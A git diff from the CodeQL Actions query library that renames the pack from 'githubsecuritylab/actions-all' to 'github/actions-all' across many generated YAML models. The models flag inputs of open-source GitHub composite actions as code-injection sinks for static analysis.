b/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["flipperdevices/flipperzero-firmware", "*", "input.firmware-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml b/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml index f3a0b47f2c2c..4f1157d862ae 100644 --- a/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml +++ b/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["fluxcd/flux2", "*", "input.bindir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml b/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml index 12011d643963..b8ded477dd2f 100644 --- a/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml +++ b/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["forcedotcom/salesforcedx-vscode", "*", "input.email", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml b/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml index 40ecb17610eb..87ae2f5d614f 100644 --- a/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml +++ b/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["fossasia/visdom", "*", "input.loadprbuild", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml b/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml index 250606588f98..0cfd7be68a34 100644 --- a/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["freckle/stack-action", "*", "input.find-options", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml b/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml index f2f5678b8b8a..54a05620d902 100644 --- a/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml +++ b/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["freeradius/freeradius-server", "*", "input.gcc_ver", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml b/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml index b17eb01f8217..e16f3fc74b3f 100644 --- a/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml +++ b/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["gaphor/gaphor", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml b/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml index 7ebdde766f3d..a3f692e7d2f3 100644 --- a/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml +++ b/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["getsentry/action-release", "*", "input.working_directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml b/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml index 7f2e1588139e..5acd7348464c 100644 --- a/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["github/codeql-action", "*", "input.latest_tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/github_ruby.model.yml b/ql/lib/ext/generated/composite-actions/github_ruby.model.yml index eedeb3844223..365dd90b1206 100644 --- a/ql/lib/ext/generated/composite-actions/github_ruby.model.yml +++ b/ql/lib/ext/generated/composite-actions/github_ruby.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["github/ruby", "*", "input.builddir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml b/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml index fb6fb0267bb9..0d7a06175a59 100644 --- a/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml +++ b/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["gittools/gitversion", "*", "input.distro", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml b/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml index 60df7484e7f3..4c831ca673af 100644 --- a/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml +++ b/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["go-spatial/tegola", "*", "input.artifact_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml b/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml index d0af7b61f989..40b5f413d661 100644 --- a/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml +++ b/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["goauthentik/authentik", "*", "input.postgresql_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml b/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml index 8d08848d24c4..565bd119df75 100644 --- a/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml +++ b/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["godotengine/godot", "*", "input.bin", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/google_dagger.model.yml b/ql/lib/ext/generated/composite-actions/google_dagger.model.yml index f26f672a586c..31157d853d0e 100644 --- a/ql/lib/ext/generated/composite-actions/google_dagger.model.yml +++ b/ql/lib/ext/generated/composite-actions/google_dagger.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["google/dagger", "*", "input.agp", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml b/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml index 5431aad8dca6..6208b63b89a9 100644 --- a/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml +++ b/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["googleapis/java-cloud-bom", "*", "input.bom-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml b/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml index 92c23f9f1fbd..1073ddd49c18 100644 --- a/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml +++ b/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["googleapis/sdk-platform-java", "*", "input.bom-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml b/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml index 52654194d81e..2b71886a286a 100644 --- a/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml +++ b/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["googlecloudplatform/magic-modules", "*", "input.repo", "code-injection", "generated"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSourceModel data: - ["googlecloudplatform/magic-modules", "*", "output.changed-files", "filename", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml b/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml index 43c274aa0337..547bcca2ec97 100644 --- a/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml +++ b/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["googlecloudplatform/magic-modules", "*", "input.repo", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml b/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml index 7f8b87fa20ef..e8ed66af89af 100644 --- a/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml +++ b/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["gravitational/teleport", "*", "input.target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml b/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml index 31422a708c5a..af1327f7d7fa 100644 --- a/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml +++ b/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["grote/transportr", "*", "input.api-level", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml b/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml index 30ccfdea6318..887743c2c703 100644 --- a/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml +++ b/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["hashicorp/nomad", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml b/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml index 9bc22ac93ef0..ff7e51e477ab 100644 --- a/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml +++ b/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["hashicorp/terraform", "*", "input.target-terraform-branch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml b/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml index 4ec47cb39750..55d0ddfba225 100644 --- a/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml +++ b/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml @@ -1,12 +1,12 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["hashicorp/vault", "*", "input.destination", "code-injection", "generated"] - ["hashicorp/vault", "*", "input.version", "code-injection", "generated"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["hashicorp/vault", "*", "input.vault-version", "output.vault-version", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml b/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml index 81d137ce5478..d4c0823c2ece 100644 --- a/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml +++ b/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["home-assistant/android", "*", "input.lokalise-token", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml b/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml index 79675d59c056..7d789ec3ccca 100644 --- a/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["homebrew/actions", "*", "input.casks", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml b/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml index 3310a67347cd..2aa6633d752e 100644 --- a/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml +++ b/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["hyperledger/aries-cloudagent-python", "*", "input.TEST_SCOPE", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml b/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml index d12963b43db2..536e6d914a25 100644 --- a/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml +++ b/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["hyperledger/fabric-samples", "*", "input.ca-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml b/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml index 1c63a9e6d0f7..45bfb025ac99 100644 --- a/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml +++ b/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["igniterealtime/openfire", "*", "input.domain", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml b/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml index e120de812c40..bba69dfc7a0e 100644 --- a/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["infracost/actions", "*", "input.behavior", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml b/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml index 1be37285c9ef..0fbc67e2b1ba 100644 --- a/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml +++ b/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["inspektor-gadget/inspektor-gadget", "*", "input.runtime", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml b/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml index aa6e9b684d08..6c6a4264d51f 100644 --- a/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml +++ b/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["intel-analytics/ipex-llm", "*", "input.extra-dependency", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml b/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml index 221aa83de0b0..ee18012a8f54 100644 --- a/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml +++ b/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ionic-team/ionic-framework", "*", "input.totalShards", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml b/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml index 710079324272..3dc390527074 100644 --- a/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml +++ b/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ionic-team/ionicons", "*", "input.paths", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml b/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml index bff13b29ecc1..b98826b9f021 100644 --- a/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml +++ b/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ionic-team/stencil", "*", "input.paths", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml b/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml index 1f75dd81c046..d000c5eb4d51 100644 --- a/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml +++ b/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ipfs/aegir", "*", "input.browser", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml b/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml index 15604c34a17a..409ef9564d35 100644 --- a/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml +++ b/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["jetbrains/jetbrainsruntime", "*", "input.debug-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml b/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml index aef7f4f6242c..60a79604580c 100644 --- a/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml +++ b/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["jhipster/generator-jhipster", "*", "input.generator-path", "code-injection", "generated"] @@ -21,7 +21,7 @@ extensions: - ["jhipster/generator-jhipster", "*", "input.application-path", "code-injection", "generated"] - ["jhipster/generator-jhipster", "*", "input.extra-args", "code-injection", "generated"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["jhipster/generator-jhipster", "*", "input.skip-workflow", "output.skip-workflow", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml b/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml index f3a26e867ec6..4effdea078e3 100644 --- a/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml +++ b/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["jsocol/django-ratelimit", "*", "input.django-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml b/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml index 4feab5714c79..d2c44be62611 100644 --- a/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml +++ b/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["juicedata/juicefs", "*", "input.compress", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml b/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml index 3030f81072a0..098782a6bef4 100644 --- a/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml +++ b/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["jupyter/docker-stacks", "*", "input.variant", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml b/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml index 7f8885d1ec78..e08f4ba9bc24 100644 --- a/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml +++ b/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["keycloak/keycloak", "*", "input.job-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml b/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml index 93e6b1e03122..973264531584 100644 --- a/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml +++ b/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["kserve/kserve", "*", "input.directory", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml b/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml index 5284159e9db5..8f6c13884c5c 100644 --- a/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["kubeflow/katib", "*", "input.experiments", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml b/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml index ac8b8a5150ae..f7f2f139e85c 100644 --- a/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["kubeflow/training-operator", "*", "input.context", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml index 19e9448994eb..11b423e871c6 100644 --- a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["kubernetes-sigs/karpenter", "*", "input.k8sVersion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml index 82c5713f9435..954b2d05858f 100644 --- a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["kubernetes-sigs/kwok", "*", "input.command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml b/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml index 2d4108331b91..6cdb74f12782 100644 --- a/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["kubescape/kubescape", "*", "input.ORIGINAL_TAG", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml b/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml index ccd49962fa4b..e6820c900e3e 100644 --- a/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["kubeshop/botkube", "*", "input.username", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml b/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml index a7e56c8626d0..ba3ad6e8b0c9 100644 --- a/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml +++ b/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["kyverno/kyverno", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml b/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml index 4c0df425e458..114b8ce168e2 100644 --- a/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml +++ b/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["lancedb/lance", "*", "input.repo", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml b/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml index a69f2303dbe4..834353d89a82 100644 --- a/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["launchdarkly/ios-client-sdk", "*", "input.ios-sim", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml b/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml index c2c87969e936..1c903d71cbef 100644 --- a/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml +++ b/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["layer5labs/meshmap-snapshot", "*", "input.assetLocation", "code-injection", "generated"] 